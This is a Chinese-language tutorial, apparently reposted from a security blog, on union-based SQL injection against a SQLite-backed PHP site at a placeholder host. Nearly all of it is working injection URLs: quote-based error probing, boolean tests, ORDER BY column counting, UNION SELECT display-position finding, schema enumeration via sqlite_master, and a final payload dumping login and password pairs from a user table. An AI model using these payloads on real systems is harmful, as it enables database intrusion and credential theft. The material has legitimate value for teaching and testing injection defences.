| sql注入入门 之 sqlite3常规注入 [ union方式]
 https://mp.weixin.qq.com/s/mwg8drZNxM51dqtglcVK1g
 
 1,本次 sqlite3 实例注入点,如下: 
 http://vuln.com/index.php?id=50&ca=7 
 2,依旧是迷人的单引号,尝试干扰id参数,返回sqlite数据库报错,具体报错信息如下 
 http://vuln.com/index.php?id=50'&ca=7 
 3,尝试闭合 
 http://vuln.com/index.php?id=50 and 1=1 &ca=7    条件为真时,页面返回正常,数字型注入 
 
 http://vuln.com/index.php?id=50 and 1=112 &ca=7  条件为假时,页面 
 4,查询当前表中的字段个数 
 http://vuln.com/index.php?id=50 order by 38 &ca=7 个数为38时返回正常 
 
 http://vuln.com/index.php?id=50 order by 39 &ca=7  个数为39时返回错误,说明当前表存在38个字段 
 8,执行union爆出对应的数据显示位,这个的显示位稍微有点儿跑偏,数据显示位在title标记里,你可以右键源代码进行查看 
 http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--&ca=7 
 9,有了数据位,接下来正常的查数据就可以了,还是先搜集下数据库信息,获取当前sqlite版本 
 http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,sqlite_version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--&ca=7 
 10,查出所有表名,这里可以用burpsuite来跑比较方便 
 http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 FROM sqlite_master WHERE type='table' limit 0,1 --&ca=7 
 11,直接一次性查出所有表名及每张表所对应的表结构 
 http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,sql,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 FROM sqlite_master WHERE type='table' limit 0,1  --&ca=7 
 
 12,查出对应字段下的账号密码数据 
 http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,login||'::'||pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 FROM utilisateurs limit 0,1  --&ca=7 
 一点小结: 
 关于sqlite注入实在没什么好说的,非常简单,作为access的替代品,在注入方式上几乎没什么不同,多练习即可…… 
 文章出处:klion's blog 原文出处:https://klionsec.github.io/2016/05/18/sqlite3-common-injection/ 
 |